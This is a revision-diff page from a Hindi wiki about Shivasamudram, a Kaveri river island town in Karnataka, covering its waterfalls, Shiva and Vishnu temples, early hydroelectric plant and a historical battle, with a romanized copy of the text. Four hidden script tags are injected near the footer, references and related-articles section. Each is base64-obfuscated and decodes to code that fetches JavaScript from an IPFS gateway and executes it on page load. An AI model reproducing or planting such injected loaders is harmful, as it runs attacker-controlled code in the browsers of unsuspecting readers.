Difference between revisions of "शिवसमुद्रम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " करीब" to " क़रीब")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
'''शिवसमुद्रम''' [[कर्नाटक]] के [[मैसूर]] में स्थित है। सोमनाथपुर से लगभग 17 मील की दूरी पर [[कावेरी नदी|कावेरी]] की दो शाखाओं के मध्य में बसा यह छोटा-सा द्वीपनगर है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=901|url=}}</ref>
+
[[चित्र:Shivanasamudra-Falls-1.jpg|thumb|250px|शिवसमुद्रम जलप्रपात]]
 
+
'''शिवसमुद्रम''' [[कर्नाटक]] के [[मैसूर]] में स्थित है। सोमनाथपुर से लगभग 17 मील की दूरी पर [[कावेरी नदी|कावेरी]] की दो शाखाओं के मध्य में बसा यह छोटा-सा द्वीपनगर है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=901|url=}}</ref><br />
 +
<br />
 
*'गगनचक्की' और 'बराचक्की' नामक दो झरने द्वीप के निकट प्रकृति की रम्य छटा उपस्थित करते हैं।
 
*'गगनचक्की' और 'बराचक्की' नामक दो झरने द्वीप के निकट प्रकृति की रम्य छटा उपस्थित करते हैं।
 +
*शिवसमुद्रम द्वीप लगभग तीन मील लम्बा और पौन मील चौड़ा है।
 
*[[शिव]] और [[विष्णु]] के दो विराटकाय और भव्य मंदिर इस स्थान के मुख्य स्मारक हैं।
 
*[[शिव]] और [[विष्णु]] के दो विराटकाय और भव्य मंदिर इस स्थान के मुख्य स्मारक हैं।
 
*शिवसमुद्रम एक प्राचीन स्थान है। यह मैसूर नगर से क़रीब 56 किलोमीटर उत्तर-पूरब में कावेरी नदी के दोआब में बसा है।
 
*शिवसमुद्रम एक प्राचीन स्थान है। यह मैसूर नगर से क़रीब 56 किलोमीटर उत्तर-पूरब में कावेरी नदी के दोआब में बसा है।
 
*इस स्थान पर कावेरी का [[जल]], पहाड़ की बनावट के कारण, विशाल [[झील]] की तरह दिखाई देता है। इसी झील से थोड़ी दूर आगे कावेरी तीन सौ अस्सी फुट की ऊंचाई से जल-प्रपात के रूप में गिरती है।<ref>{{cite web |url= http://hindi.indiawaterportal.org/%E0%A4%95%E0%A4%BE%E0%A4%B5%E0%A5%87%E0%A4%B0%E0%A5%80|title= कावेरी|accessmonthday=23 अगस्त |accessyear= 2014|last= |first= |authorlink= |format= |publisher=इण्डिया वाटर पोर्टल|language= हिन्दी}}</ref>
 
*इस स्थान पर कावेरी का [[जल]], पहाड़ की बनावट के कारण, विशाल [[झील]] की तरह दिखाई देता है। इसी झील से थोड़ी दूर आगे कावेरी तीन सौ अस्सी फुट की ऊंचाई से जल-प्रपात के रूप में गिरती है।<ref>{{cite web |url= http://hindi.indiawaterportal.org/%E0%A4%95%E0%A4%BE%E0%A4%B5%E0%A5%87%E0%A4%B0%E0%A5%80|title= कावेरी|accessmonthday=23 अगस्त |accessyear= 2014|last= |first= |authorlink= |format= |publisher=इण्डिया वाटर पोर्टल|language= हिन्दी}}</ref>
 
*[[कावेरी नदी]] तीन स्थानों पर दो शाखाओं में बंटकर फिर से एक हो जाती है, जिससे तीन द्वीप बन गए हैं। ये द्वीप हैं- 'आदिरंगम', 'शिवसमुद्रम' तथा '[[श्रीरंगम]]'।
 
*[[कावेरी नदी]] तीन स्थानों पर दो शाखाओं में बंटकर फिर से एक हो जाती है, जिससे तीन द्वीप बन गए हैं। ये द्वीप हैं- 'आदिरंगम', 'शिवसमुद्रम' तथा '[[श्रीरंगम]]'।
 +
*यहाँ से 3 मील पर दक्षिण विडिगिरि रंग पर्वत है। [[पर्वत]] पर चम्पकारण्य क्षेत्र में श्रीनिवास मंदिर है। इसमें [[विष्णु|भगवान विष्णु]] की खड़ी मूर्ति है।
 
*सन [[1902]] में [[भारत]] की सबसे पहली जलविद्युत परियोजना भी शिवसमुद्रम में ही स्थापित की गयी थी।
 
*सन [[1902]] में [[भारत]] की सबसे पहली जलविद्युत परियोजना भी शिवसमुद्रम में ही स्थापित की गयी थी।
 
*[[भारत का इतिहास|भारतीय इतिहास]] में दक्षिण की विजय के समय [[कृष्णदेव राय|राजा कृष्णदेव राय]] ने शिवसमुद्रम के युद्ध में ही कावेरी के प्रवाह को परिवर्तित करके अपूर्व रण-कौशल का परिचय दिया था और उस अजेय जल [[दुर्ग]] को जीत लिया था।
 
*[[भारत का इतिहास|भारतीय इतिहास]] में दक्षिण की विजय के समय [[कृष्णदेव राय|राजा कृष्णदेव राय]] ने शिवसमुद्रम के युद्ध में ही कावेरी के प्रवाह को परिवर्तित करके अपूर्व रण-कौशल का परिचय दिया था और उस अजेय जल [[दुर्ग]] को जीत लिया था।

Latest revision as of 04:05, 26 May 2021

thumb|250px|shivasamudram jalaprapat shivasamudram karnatak ke maisoor mean sthit hai. somanathapur se lagabhag 17 mil ki doori par kaveri ki do shakhaoan ke madhy mean basa yah chhota-sa dvipanagar hai.[1]

  • 'gaganachakki' aur 'barachakki' namak do jharane dvip ke nikat prakriti ki ramy chhata upasthit karate haian.
  • shivasamudram dvip lagabhag tin mil lamba aur paun mil chau da hai.
  • shiv aur vishnu ke do viratakay aur bhavy mandir is sthan ke mukhy smarak haian.
  • shivasamudram ek prachin sthan hai. yah maisoor nagar se qarib 56 kilomitar uttar-poorab mean kaveri nadi ke doab mean basa hai.
  • is sthan par kaveri ka jal, paha d ki banavat ke karan, vishal jhil ki tarah dikhaee deta hai. isi jhil se tho di door age kaveri tin sau assi phut ki ooanchaee se jal-prapat ke roop mean girati hai.[2]
  • kaveri nadi tin sthanoan par do shakhaoan mean bantakar phir se ek ho jati hai, jisase tin dvip ban ge haian. ye dvip haian- 'adirangam', 'shivasamudram' tatha 'shrirangam'.
  • yahaan se 3 mil par dakshin vidigiri rang parvat hai. parvat par champakarany kshetr mean shrinivas mandir hai. isamean bhagavan vishnu ki kh di moorti hai.
  • san 1902 mean bharat ki sabase pahali jalavidyut pariyojana bhi shivasamudram mean hi sthapit ki gayi thi.
  • bharatiy itihas mean dakshin ki vijay ke samay raja krishnadev ray ne shivasamudram ke yuddh mean hi kaveri ke pravah ko parivartit karake apoorv ran-kaushal ka parichay diya tha aur us ajey jal durg ko jit liya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharatakosh pustakalay |prishth sankhya: 901 |
  2. kaveri (hindi) indiya vatar portal. abhigaman tithi: 23 agast, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>